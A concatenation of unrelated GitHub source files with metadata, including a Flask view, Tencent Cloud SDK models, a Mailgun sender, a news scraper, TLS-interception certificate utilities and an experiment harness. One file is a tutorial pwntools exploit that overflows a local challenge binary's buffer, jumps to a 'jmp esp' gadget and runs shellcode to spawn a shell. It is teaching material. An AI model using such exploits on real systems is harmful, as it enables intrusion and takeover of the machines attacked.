'body':'Beautiful day in Portland!'
},
{'author':user,
'body':'Think in java'
}
]
return render_template(
'user.html',
user = user,
posts = posts,
)
|
{
"content_hash": "d33ae6e3fe856aee3afc2f1a1d308944",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 99,
"avg_line_length": 24,
"alnum_prop": 0.6806615776081425,
"repo_name": "youxun/learning",
"id": "b35881163ffa73eccafc5b64006e1a0850338ffd",
"size": "3176",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7776"
}
],
"symlink_target": ""
}
|
from pwn import *
# Create an instance of the process to talk to
io = gdb.debug('./challenge')
# Attach a debugger to the process so that we can step through
pause()
# Load a copy of the binary so that we can find a JMP ESP
binary = ELF('./challenge')
# Assemble the byte sequence for 'jmp esp' so we can search for it
jmp_esp = asm('jmp esp')
jmp_esp = binary.search(jmp_esp).next()
log.info("Found jmp esp at %#x" % jmp_esp)
# Overflow the buffer with a cyclic pattern to make it easy to find offsets
#
# If we let the program crash with just the pattern as input, the register
# state will look something like this:
#
# EBP 0x6161616b ('kaaa')
# *ESP 0xff84be30 <-- 'maaanaaaoaaapaaaqaaar...'
# *EIP 0x6161616c ('laaa')
crash = False
if crash:
pattern = cyclic(512)
io.sendline(pattern)
pause()
sys.exit()
# Fill out the buffer until where we control EIP
exploit = cyclic(cyclic_find(0x6161616c))
# Fill the spot where we control EIP with the address of 'jmp esp'
exploit += pack(jmp_esp)
# Add our shellcode
exploit += asm(shellcraft.sh())
# gets() waits for a newline
io.sendline(exploit)
# Enjoy our shell
io.interactive()
|
{
"content_hash": "6f45950e5eab83848a05c54d206b588b",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 75,
"avg_line_length": 24.29787234042553,
"alnum_prop": 0.702276707530648,
"repo_name": "idkwim/tutorial",
"id": "aad25fc962c44aa14811b3b994922e5295958a07",
"size": "1188",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "walkthrough/buffer-overflow-basic/exploit.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "669"
},
{
"name": "Makefile",
"bytes": "257"
},
{
"name": "Python",
"bytes": "5275"
}
],
"symlink_target": ""
}
|
import socket #for sockets
import sys #for exit
try:
#create an AF_INET, STREAM socket (TCP)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
print 'Failed to create socket. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
sys.exit();
print 'Socket Created'
host = 'www.google.com'
port = 80
try:
remote_ip = socket.gethostbyname( host )
except socket.gaierror:
#could not resolve
print 'Hostname could not be resolved. Exiting'
sys.exit()
print 'Ip address of ' + host + ' is ' + remote_ip
#Connect to remote server
s.connect((remote_ip , port))
print 'Socket Connected to ' + host + ' on ip ' + remote_ip
|
{
"content_hash": "4b401cd12d455409113d72e223803a9f",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 96,
"avg_line_length": 24.310344827586206,
"alnum_prop": 0.649645390070922,
"repo_name": "janusnic/21v-python",
"id": "812fe4d95ab2dd4e1f0bc7753fab675cf06d9260",
"size": "705",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "unit_18/client/c4.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "369"
},
{
"name": "Python",
"bytes": "990972"
},
{
"name": "SQLPL",
"bytes": "147"
}
],
"symlink_target": ""
}
|
import warnings
from tencentcloud.common.abstract_model import AbstractModel
class CompareMetricsData(AbstractModel):
"""结构化对比指标(准确率/召回率)数据
"""
def __init__(self):
r"""
        :param ShortStructAccuracy: Accuracy for short-document structuring
        :type ShortStructAccuracy: str
        :param ShortStructRecall: Recall for short-document structuring
        :type ShortStructRecall: str
        :param LongStructAccuracy: Accuracy for long-document structuring
        :type LongStructAccuracy: str
        :param LongStructRecall: Recall for long-document structuring
        :type LongStructRecall: str
        :param LongContentAccuracy: Accuracy for long-document content extraction
        :type LongContentAccuracy: str
        :param LongContentRecall: Recall for long-document content extraction
        :type LongContentRecall: str
"""
self.ShortStructAccuracy = None
self.ShortStructRecall = None
self.LongStructAccuracy = None
self.LongStructRecall = None
self.LongContentAccuracy = None
self.LongContentRecall = None
def _deserialize(self, params):
self.ShortStructAccuracy = params.get("ShortStructAccuracy")
self.ShortStructRecall = params.get("ShortStructRecall")
self.LongStructAccuracy = params.get("LongStructAccuracy")
self.LongStructRecall = params.get("LongStructRecall")
self.LongContentAccuracy = params.get("LongContentAccuracy")
self.LongContentRecall = params.get("LongContentRecall")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class CreateStructureTaskRequest(AbstractModel):
"""CreateStructureTask请求参数结构体
"""
def __init__(self):
r"""
        :param PolicyId: Policy number
        :type PolicyId: str
        :param CustomerId: Customer ID
        :type CustomerId: str
        :param CustomerName: Customer name
        :type CustomerName: str
        :param TaskType: File type. Currently only health examination reports are supported; the corresponding value is HealthReport
        :type TaskType: str
        :param Year: Report year
        :type Year: str
        :param FileList: List of URLs of the uploaded report files, in order. If the ImageList parameter is used, set this to an empty array
        :type FileList: list of str
        :param InsuranceTypes: Insurance types. Required when the file type is a health examination report. Possible values:
CriticalDiseaseInsurance: critical illness insurance
LifeInsurance: life insurance
AccidentInsurance: accident insurance
        :type InsuranceTypes: list of str
        :param ImageList: Array of uploaded report image contents, base64-encoded, in order
        :type ImageList: list of str
"""
self.PolicyId = None
self.CustomerId = None
self.CustomerName = None
self.TaskType = None
self.Year = None
self.FileList = None
self.InsuranceTypes = None
self.ImageList = None
def _deserialize(self, params):
self.PolicyId = params.get("PolicyId")
self.CustomerId = params.get("CustomerId")
self.CustomerName = params.get("CustomerName")
self.TaskType = params.get("TaskType")
self.Year = params.get("Year")
self.FileList = params.get("FileList")
self.InsuranceTypes = params.get("InsuranceTypes")
self.ImageList = params.get("ImageList")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class CreateStructureTaskResponse(AbstractModel):
"""CreateStructureTask返回参数结构体
"""
def __init__(self):
r"""
        :param TaskId: ID of this structuring task
        :type TaskId: str
        :param RequestId: Unique request ID, returned with every request. Provide this RequestId when troubleshooting.
        :type RequestId: str
"""
self.TaskId = None
self.RequestId = None
def _deserialize(self, params):
self.TaskId = params.get("TaskId")
self.RequestId = params.get("RequestId")
class DescribeStructCompareDataRequest(AbstractModel):
"""DescribeStructCompareData请求参数结构体
"""
def __init__(self):
r"""
        :param TaskId: Structuring task ID
        :type TaskId: str
"""
self.TaskId = None
def _deserialize(self, params):
self.TaskId = params.get("TaskId")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class DescribeStructCompareDataResponse(AbstractModel):
"""DescribeStructCompareData返回参数结构体
"""
def __init__(self):
r"""
        :param PolicyId: Policy number
        :type PolicyId: str
        :param TaskId: Structuring task ID
        :type TaskId: str
        :param CustomerId: Customer ID
        :type CustomerId: str
        :param CustomerName: Customer name
        :type CustomerName: str
        :param ReviewTime: Review time
        :type ReviewTime: str
        :param MachineResult: Algorithm recognition result
        :type MachineResult: str
        :param ManualResult: Manual review result
        :type ManualResult: str
        :param Metrics: Structured comparison metrics data
        :type Metrics: :class:`tencentcloud.cii.v20201210.models.CompareMetricsData`
        :param NewItems: Newly added items
        :type NewItems: str
        :param ModifyItems: Modified items
        :type ModifyItems: str
        :param RequestId: Unique request ID, returned with every request. Provide this RequestId when troubleshooting.
        :type RequestId: str
"""
self.PolicyId = None
self.TaskId = None
self.CustomerId = None
self.CustomerName = None
self.ReviewTime = None
self.MachineResult = None
self.ManualResult = None
self.Metrics = None
self.NewItems = None
self.ModifyItems = None
self.RequestId = None
def _deserialize(self, params):
self.PolicyId = params.get("PolicyId")
self.TaskId = params.get("TaskId")
self.CustomerId = params.get("CustomerId")
self.CustomerName = params.get("CustomerName")
self.ReviewTime = params.get("ReviewTime")
self.MachineResult = params.get("MachineResult")
self.ManualResult = params.get("ManualResult")
if params.get("Metrics") is not None:
self.Metrics = CompareMetricsData()
self.Metrics._deserialize(params.get("Metrics"))
self.NewItems = params.get("NewItems")
self.ModifyItems = params.get("ModifyItems")
self.RequestId = params.get("RequestId")
class DescribeStructureTaskResultRequest(AbstractModel):
"""DescribeStructureTaskResult请求参数结构体
"""
def __init__(self):
r"""
        :param TaskId: Structuring task ID
        :type TaskId: str
"""
self.TaskId = None
def _deserialize(self, params):
self.TaskId = params.get("TaskId")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class DescribeStructureTaskResultResponse(AbstractModel):
"""DescribeStructureTaskResult返回参数结构体
"""
def __init__(self):
r"""
        :param Status: Result status:
0: returned successfully
1: result not yet generated
2: result generation failed
        :type Status: int
        :param Results: Array of structured recognition results; each element corresponds to the structured result of one image, in the same order as the ImageList or FileList input parameter.
Note: this field may return null, indicating that no valid value could be obtained.
        :type Results: list of ResultObject
        :param RequestId: Unique request ID, returned with every request. Provide this RequestId when troubleshooting.
        :type RequestId: str
"""
self.Status = None
self.Results = None
self.RequestId = None
def _deserialize(self, params):
self.Status = params.get("Status")
if params.get("Results") is not None:
self.Results = []
for item in params.get("Results"):
obj = ResultObject()
obj._deserialize(item)
self.Results.append(obj)
self.RequestId = params.get("RequestId")
class ResultObject(AbstractModel):
"""用于返回结构化任务结果
"""
def __init__(self):
r"""
        :param Quality: Image quality score
        :type Quality: float
        :param StructureResult: String converted from the structuring algorithm's structured JSON output; see the algorithm structured-result protocol for details
        :type StructureResult: str
"""
self.Quality = None
self.StructureResult = None
def _deserialize(self, params):
self.Quality = params.get("Quality")
self.StructureResult = params.get("StructureResult")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
|
{
"content_hash": "e6db112d6b87cf43a0c9cda7f565e650",
"timestamp": "",
"source": "github",
"line_count": 292,
"max_line_length": 84,
"avg_line_length": 30.198630136986303,
"alnum_prop": 0.6085280108868224,
"repo_name": "tzpBingo/github-trending",
"id": "8f811079e926991844f47ad5a603f72f52e8c7fe",
"size": "10500",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "codespace/python/tencentcloud/cii/v20201210/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Go",
"bytes": "11470"
},
{
"name": "HTML",
"bytes": "1543"
},
{
"name": "Python",
"bytes": "49985109"
},
{
"name": "Shell",
"bytes": "18039"
}
],
"symlink_target": ""
}
|
import requests,sys
from bs4 import BeautifulSoup
from SenseCells.tts import tts
from GreyMatter.utils import clean_msg
# Google News
fixed_url = 'https://news.google.com/'
news_headlines_list = []
news_details_list = []
r = requests.get(fixed_url)
data = r.text
soup = BeautifulSoup(data, "html.parser")
for news_body in soup.find_all("td", "esc-layout-article-cell"):
title = news_body.find("span", "titletext")
detail = news_body.find("div", "esc-lead-snippet-wrapper")
if title is not None:
for span in title:
news_headlines_list.append(span)
# TBD - add news details as well
#news_headlines_list_small = [element.lower().replace("(", "").replace(")", "").replace("'", "") for element in news_headlines_list]
#news_details_list_small = [element.lower().replace("(", "").replace(")", "").replace("'", "") for element in news_details_list]
#news_dictionary = dict(zip(news_headlines_list_small, news_details_list_small))
def news_reader():
for value in news_headlines_list:
tts('Headline, ' + clean_msg(value).encode('utf8'))
#tts('News, ' + value)
|
{
"content_hash": "9ce0f7893b4eebc776ea4f5992b85960",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 132,
"avg_line_length": 35.5625,
"alnum_prop": 0.6511423550087874,
"repo_name": "sjsucohort6/amigo-chatbot",
"id": "9443cdfcabaff01c94d20ac4c416559b77f576d9",
"size": "1138",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ria/GreyMatter/news_reader.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "7026"
},
{
"name": "Java",
"bytes": "245483"
},
{
"name": "JavaScript",
"bytes": "2415"
},
{
"name": "Python",
"bytes": "30505"
},
{
"name": "Shell",
"bytes": "35959"
},
{
"name": "Thrift",
"bytes": "334"
}
],
"symlink_target": ""
}
|
from couchdbkit import Consumer
def get_recent_changes(db, limit=500):
c = Consumer(db)
changes = c.fetch(limit=limit, descending=True, include_docs=True)['results']
for row in changes:
yield {
'id':row['id'],
'rev': row['changes'][0]['rev'],
'domain': row['doc'].get('domain', '[no domain]'),
'doc_type': row['doc'].get('doc_type', '[no doc_type]'),
}
|
{
"content_hash": "263d61e097d44634c3a35a6a4fb85324",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 81,
"avg_line_length": 33.15384615384615,
"alnum_prop": 0.5382830626450116,
"repo_name": "gmimano/commcaretest",
"id": "98e5ef52b05b50fa7236eca77a6d5f7d78d354e3",
"size": "431",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "corehq/apps/hqadmin/history.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "15950"
},
{
"name": "CSS",
"bytes": "282577"
},
{
"name": "JavaScript",
"bytes": "2731012"
},
{
"name": "Python",
"bytes": "4738450"
},
{
"name": "Shell",
"bytes": "22454"
}
],
"symlink_target": ""
}
|
__author__ = 'aobrien'
"""This module incorporates email sending using mailgun."""
import os
import requests
import config
# Enter the domain associated with your Mailgun account here
DOMAIN = os.getenv('MAILGUN_DOMAIN')
# Enter your Mailgun API Key here
API_KEY = os.getenv('MAILGUN_API_KEY')
def send_simple_message(from_email, to_list, subject, message, from_name=None):
"""
Parameters
----------
from_email : str
A string specify the email address of sender (e.g., 'admin@example.com').
to_list : list of strings
A list of strings containing recipient email addresses.
subject : str
A string specifying subject.
message : str
A string containing the body of the email.
from_name: str (optional)
A string specifying the name of the sender.
"""
FROM_FIELD = build_sender(from_email, from_name)
return requests.post(
"https://api.mailgun.net/v2/%s/messages" % DOMAIN,
auth=("api", API_KEY),
data={"from": FROM_FIELD,
"to": to_list,
"subject": subject,
"text": message})
def build_sender(from_email, from_name):
if from_name is None:
return from_email
else:
return "%s <%s>" % (from_name, from_email)
|
{
"content_hash": "2b5ac2bbe8fc6b406e53a4a0d773f47b",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 81,
"avg_line_length": 29.136363636363637,
"alnum_prop": 0.625585023400936,
"repo_name": "asobrien/carlae",
"id": "bea636636fa6acd51d79ec3c73694db6fff45868",
"size": "1307",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "carlae/mail.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4104"
},
{
"name": "HTML",
"bytes": "18475"
},
{
"name": "JavaScript",
"bytes": "969"
},
{
"name": "Python",
"bytes": "29229"
}
],
"symlink_target": ""
}
|
import os, ssl, time, datetime
from pyasn1.type import univ, constraint, char, namedtype, tag
from pyasn1.codec.der.decoder import decode
from pyasn1.error import PyAsn1Error
import OpenSSL
import tcp
default_exp = 62208000 # =24 * 60 * 60 * 720
default_o = "mitmproxy"
default_cn = "mitmproxy"
def create_ca(o=default_o, cn=default_cn, exp=default_exp):
key = OpenSSL.crypto.PKey()
key.generate_key(OpenSSL.crypto.TYPE_RSA, 1024)
ca = OpenSSL.crypto.X509()
ca.set_serial_number(int(time.time()*10000))
ca.set_version(2)
ca.get_subject().CN = cn
ca.get_subject().O = o
ca.gmtime_adj_notBefore(0)
ca.gmtime_adj_notAfter(exp)
ca.set_issuer(ca.get_subject())
ca.set_pubkey(key)
ca.add_extensions([
OpenSSL.crypto.X509Extension("basicConstraints", True,
"CA:TRUE"),
OpenSSL.crypto.X509Extension("nsCertType", True,
"sslCA"),
OpenSSL.crypto.X509Extension("extendedKeyUsage", True,
"serverAuth,clientAuth,emailProtection,timeStamping,msCodeInd,msCodeCom,msCTLSign,msSGC,msEFS,nsSGC"
),
OpenSSL.crypto.X509Extension("keyUsage", False,
"keyCertSign, cRLSign"),
OpenSSL.crypto.X509Extension("subjectKeyIdentifier", False, "hash",
subject=ca),
])
ca.sign(key, "sha1")
return key, ca
def dummy_ca(path, o=default_o, cn=default_cn, exp=default_exp):
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
if path.endswith(".pem"):
basename, _ = os.path.splitext(path)
basename = os.path.basename(basename)
else:
basename = os.path.basename(path)
key, ca = create_ca(o=o, cn=cn, exp=exp)
# Dump the CA plus private key
f = open(path, "wb")
f.write(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, key))
f.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, ca))
f.close()
# Dump the certificate in PEM format
f = open(os.path.join(dirname, basename + "-cert.pem"), "wb")
f.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, ca))
f.close()
# Create a .cer file with the same contents for Android
f = open(os.path.join(dirname, basename + "-cert.cer"), "wb")
f.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, ca))
f.close()
# Dump the certificate in PKCS12 format for Windows devices
f = open(os.path.join(dirname, basename + "-cert.p12"), "wb")
p12 = OpenSSL.crypto.PKCS12()
p12.set_certificate(ca)
p12.set_privatekey(key)
f.write(p12.export())
f.close()
return True
def dummy_cert(ca, commonname, sans):
"""
    Generates a certificate signed by the given certificate authority.
    ca: Path to a PEM file containing the CA certificate and private key.
    commonname: Common name for the generated certificate.
    sans: A list of Subject Alternate Names.
    Returns an SSLCert wrapping the generated certificate.
"""
ss = []
for i in sans:
ss.append("DNS: %s"%i)
ss = ", ".join(ss)
raw = file(ca, "rb").read()
ca = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, raw)
key = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, raw)
cert = OpenSSL.crypto.X509()
cert.gmtime_adj_notBefore(-3600*48)
cert.gmtime_adj_notAfter(60 * 60 * 24 * 30)
cert.set_issuer(ca.get_subject())
cert.get_subject().CN = commonname
cert.set_serial_number(int(time.time()*10000))
if ss:
cert.set_version(2)
cert.add_extensions([OpenSSL.crypto.X509Extension("subjectAltName", True, ss)])
cert.set_pubkey(ca.get_pubkey())
cert.sign(key, "sha1")
return SSLCert(cert)
class CertStore:
"""
Implements an in-memory certificate store.
"""
def __init__(self):
self.certs = {}
def get_cert(self, commonname, sans, cacert):
"""
Returns an SSLCert object.
commonname: Common name for the generated certificate. Must be a
valid, plain-ASCII, IDNA-encoded domain name.
sans: A list of Subject Alternate Names.
cacert: The path to a CA certificate.
        Generated certificates are cached by common name.
"""
if commonname in self.certs:
return self.certs[commonname]
c = dummy_cert(cacert, commonname, sans)
self.certs[commonname] = c
return c
class _GeneralName(univ.Choice):
# We are only interested in dNSNames. We use a default handler to ignore
# other types.
componentType = namedtype.NamedTypes(
namedtype.NamedType('dNSName', char.IA5String().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)
)
),
)
class _GeneralNames(univ.SequenceOf):
componentType = _GeneralName()
sizeSpec = univ.SequenceOf.sizeSpec + constraint.ValueSizeConstraint(1, 1024)
class SSLCert:
def __init__(self, cert):
"""
        Wraps a pyOpenSSL X509 certificate object.
"""
self.x509 = cert
@classmethod
def from_pem(klass, txt):
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, txt)
return klass(x509)
@classmethod
def from_der(klass, der):
pem = ssl.DER_cert_to_PEM_cert(der)
return klass.from_pem(pem)
def to_pem(self):
return OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, self.x509)
def digest(self, name):
return self.x509.digest(name)
@property
def issuer(self):
return self.x509.get_issuer().get_components()
@property
def notbefore(self):
t = self.x509.get_notBefore()
return datetime.datetime.strptime(t, "%Y%m%d%H%M%SZ")
@property
def notafter(self):
t = self.x509.get_notAfter()
return datetime.datetime.strptime(t, "%Y%m%d%H%M%SZ")
@property
def has_expired(self):
return self.x509.has_expired()
@property
def subject(self):
return self.x509.get_subject().get_components()
@property
def serial(self):
return self.x509.get_serial_number()
@property
def keyinfo(self):
pk = self.x509.get_pubkey()
types = {
OpenSSL.crypto.TYPE_RSA: "RSA",
OpenSSL.crypto.TYPE_DSA: "DSA",
}
return (
types.get(pk.type(), "UNKNOWN"),
pk.bits()
)
@property
def cn(self):
c = None
for i in self.subject:
if i[0] == "CN":
c = i[1]
return c
@property
def altnames(self):
altnames = []
for i in range(self.x509.get_extension_count()):
ext = self.x509.get_extension(i)
if ext.get_short_name() == "subjectAltName":
try:
dec = decode(ext.get_data(), asn1Spec=_GeneralNames())
except PyAsn1Error:
continue
for i in dec[0]:
altnames.append(i[0].asOctets())
return altnames
def get_remote_cert(host, port, sni):
c = tcp.TCPClient(host, port)
c.connect()
c.convert_to_ssl(sni=sni)
return c.cert
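# Hedged usage sketch (illustrative only, not part of the original module):
# generate a throwaway CA on disk, then mint per-host certificates through the
# in-memory CertStore defined above.
#
#   ca_path = "/tmp/demo-ca.pem"        # hypothetical location
#   dummy_ca(ca_path)                   # writes the CA key/cert plus .cer/.p12 copies
#   store = CertStore()
#   cert = store.get_cert("example.com", ["www.example.com"], ca_path)
#   # cert is an SSLCert; cert.cn, cert.altnames and cert.notafter are then available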
|
{
"content_hash": "14c76f30ee1be3bbcdd06ba3a25fb1d9",
"timestamp": "",
"source": "github",
"line_count": 243,
"max_line_length": 136,
"avg_line_length": 30.633744855967077,
"alnum_prop": 0.602498656636217,
"repo_name": "fkolacek/FIT-VUT",
"id": "0349bec7a5c5c6c7437ba761b1ad3f5699d6bedb",
"size": "7444",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bp-revok/python/lib/python2.7/site-packages/netlib/certutils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "455326"
},
{
"name": "Awk",
"bytes": "8724"
},
{
"name": "Batchfile",
"bytes": "201"
},
{
"name": "Brainfuck",
"bytes": "83"
},
{
"name": "C",
"bytes": "5006938"
},
{
"name": "C++",
"bytes": "1835332"
},
{
"name": "CSS",
"bytes": "301045"
},
{
"name": "CoffeeScript",
"bytes": "46327"
},
{
"name": "Groff",
"bytes": "46766"
},
{
"name": "HTML",
"bytes": "937735"
},
{
"name": "Java",
"bytes": "552132"
},
{
"name": "JavaScript",
"bytes": "1742225"
},
{
"name": "Lua",
"bytes": "39700"
},
{
"name": "Makefile",
"bytes": "381793"
},
{
"name": "Objective-C",
"bytes": "4618"
},
{
"name": "PHP",
"bytes": "108701"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Perl",
"bytes": "60353"
},
{
"name": "Python",
"bytes": "22084026"
},
{
"name": "QMake",
"bytes": "2660"
},
{
"name": "R",
"bytes": "1370"
},
{
"name": "Ragel in Ruby Host",
"bytes": "17993"
},
{
"name": "Ruby",
"bytes": "21607145"
},
{
"name": "Shell",
"bytes": "611321"
},
{
"name": "Tcl",
"bytes": "4920"
},
{
"name": "TeX",
"bytes": "561423"
},
{
"name": "VHDL",
"bytes": "49180"
},
{
"name": "Visual Basic",
"bytes": "481"
},
{
"name": "XSLT",
"bytes": "154638"
},
{
"name": "Yacc",
"bytes": "32788"
}
],
"symlink_target": ""
}
|
"""
Runs many queries and keeps track of some results
"""
from __future__ import absolute_import, division, print_function
import sys
import textwrap
import numpy as np # NOQA
import utool as ut
from ibeis.expt import experiment_helpers
from ibeis.expt import test_result
print, rrr, profile = ut.inject2(__name__)
NOMEMORY = ut.get_argflag('--nomemory')
TESTRES_VERBOSITY = 2 - (2 * ut.QUIET)
NOCACHE_TESTRES = ut.get_argflag(('--nocache-testres', '--nocache-big'),
False)
USE_BIG_TEST_CACHE = (not ut.get_argflag(('--no-use-testcache',
'--nocache-test')) and
ut.USE_CACHE and
not NOCACHE_TESTRES)
USE_BIG_TEST_CACHE = False
TEST_INFO = True
# don't actually query; just print labels and stuff
DRY_RUN = ut.get_argflag(('--dryrun', '--dry'))
def run_expt(ibs, acfg_name_list, test_cfg_name_list, use_cache=None,
qaid_override=None, daid_override=None, initial_aids=None):
r"""
Loops over annot configs.
    Try to use this function as a starting point to clean up this module.
    The code is becoming untenable.
CommandLine:
python -m ibeis.expt.harness run_expt --acfginfo
python -m ibeis.expt.harness run_expt --pcfginfo
python -m ibeis.expt.harness run_expt
Ignore:
test_cfg_name_list = [p]
Example:
>>> # SLOW_DOCTEST
>>> from ibeis.expt.harness import * # NOQA
>>> import ibeis
>>> ibs = ibeis.opendb(defaultdb='PZ_MTEST')
>>> default_acfgstrs = ['ctrl:qsize=20,dpername=1,dsize=10',
>>> 'ctrl:qsize=20,dpername=10,dsize=20']
>>> acfg_name_list = default_acfgstrs
>>> test_cfg_name_list = ['default:proot=smk', 'default']
>>> #test_cfg_name_list = ['custom', 'custom:fg_on=False']
>>> use_cache = False
>>> testres_list = run_expt(ibs, acfg_name_list, test_cfg_name_list, use_cache)
"""
print('[harn] run_expt')
# Generate list of database annotation configurations
if len(acfg_name_list) == 0:
raise ValueError('must give acfg name list')
acfg_list, expanded_aids_list = experiment_helpers.get_annotcfg_list(
ibs, acfg_name_list, qaid_override=qaid_override,
daid_override=daid_override, initial_aids=initial_aids,
use_cache=use_cache)
# Generate list of query pipeline param configs
cfgdict_list, pipecfg_list = experiment_helpers.get_pipecfg_list(
test_cfg_name_list, ibs=ibs)
cfgx2_lbl = experiment_helpers.get_varied_pipecfg_lbls(cfgdict_list)
# NOTE: Can specify --pcfginfo or --acfginfo
if ut.NOT_QUIET:
ut.colorprint(textwrap.dedent("""
[harn]================
[harn] harness.test_configurations2()""").strip(), 'white')
msg = '[harn] Running %s using %s and %s' % (
ut.quantstr('test', len(acfg_list) * len(cfgdict_list)),
ut.quantstr('pipeline config', len(cfgdict_list)),
ut.quantstr('annot config', len(acfg_list)),
)
ut.colorprint(msg, 'white')
testres_list = []
nAcfg = len(acfg_list)
testnameid = (ibs.get_dbname() + ' ' + str(test_cfg_name_list) +
str(acfg_name_list))
lbl = '[harn] TEST_CFG ' + str(test_cfg_name_list) + str(acfg_name_list)
expanded_aids_iter = ut.ProgIter(expanded_aids_list, lbl='annot config',
freq=1, autoadjust=False,
enabled=ut.NOT_QUIET)
for acfgx, (qaids, daids) in enumerate(expanded_aids_iter):
assert len(qaids) != 0, ('[harness] No query annots specified')
        assert len(daids) != 0, ('[harness] No database annots specified')
acfg = acfg_list[acfgx]
if ut.NOT_QUIET:
ut.colorprint('\n---Annot config testnameid=%r' % (
testnameid,), 'turquoise')
subindexer_partial = ut.ProgPartial(parent_index=acfgx,
parent_length=nAcfg,
enabled=ut.NOT_QUIET)
testres_ = make_single_testres(ibs, qaids, daids, pipecfg_list,
cfgx2_lbl, cfgdict_list, lbl,
testnameid, use_cache=use_cache,
subindexer_partial=subindexer_partial)
if DRY_RUN:
continue
testres_.acfg = acfg
testres_.test_cfg_name_list = test_cfg_name_list
testres_list.append(testres_)
if DRY_RUN:
print('DRYRUN: Cannot continue past run_expt')
sys.exit(0)
testres = test_result.combine_testres_list(ibs, testres_list)
# testres.print_results()
print('Returning Test Result')
return testres
@profile
def make_single_testres(ibs, qaids, daids, pipecfg_list, cfgx2_lbl,
cfgdict_list, lbl, testnameid, use_cache=None,
subindexer_partial=ut.ProgIter):
"""
CommandLine:
python -m ibeis run_expt
"""
cfgslice = None
if cfgslice is not None:
pipecfg_list = pipecfg_list[cfgslice]
dbname = ibs.get_dbname()
# if ut.NOT_QUIET:
# print('[harn] Make single testres')
cfgx2_qreq_ = [
ibs.new_query_request(qaids, daids, verbose=False, query_cfg=pipe_cfg)
for pipe_cfg in ut.ProgIter(pipecfg_list, lbl='Building qreq_',
enabled=False)
]
if use_cache is None:
use_cache = USE_BIG_TEST_CACHE
if use_cache:
try:
bt_cachedir = ut.ensuredir((ibs.get_cachedir(), 'BULK_TEST_CACHE2'))
cfgstr_list = [qreq_.get_cfgstr(with_input=True)
for qreq_ in cfgx2_qreq_]
bt_cachestr = ut.hashstr_arr27(cfgstr_list, ibs.get_dbname() + '_cfgs')
bt_cachename = 'BULKTESTCACHE2_v2'
testres = ut.load_cache(bt_cachedir, bt_cachename, bt_cachestr)
testres.cfgdict_list = cfgdict_list
testres.cfgx2_lbl = cfgx2_lbl # hack override
except IOError:
pass
else:
if ut.NOT_QUIET:
ut.colorprint('[harn] single testres cache hit... returning',
'turquoise')
return testres
if ibs.table_cache:
# HACK
prev_feat_cfgstr = None
cfgx2_cmsinfo = []
cfgiter = subindexer_partial(range(len(cfgx2_qreq_)), lbl='pipe config',
freq=1, adjust=False)
# Run each pipeline configuration
for cfgx in cfgiter:
qreq_ = cfgx2_qreq_[cfgx]
cprint = ut.colorprint
cprint('testnameid=%r' % (testnameid,), 'green')
cprint('annot_cfgstr = %s' % (
qreq_.get_cfgstr(with_input=True, with_pipe=False),), 'yellow')
cprint('pipe_cfgstr= %s' % (
qreq_.get_cfgstr(with_data=False),), 'turquoise')
cprint('pipe_hashstr = %s' % (qreq_.get_pipe_hashid(),), 'teal')
if DRY_RUN:
continue
indent_prefix = '[%s cfg %d/%d]' % (
dbname,
            # cfgiter.count (doesn't work when quiet)
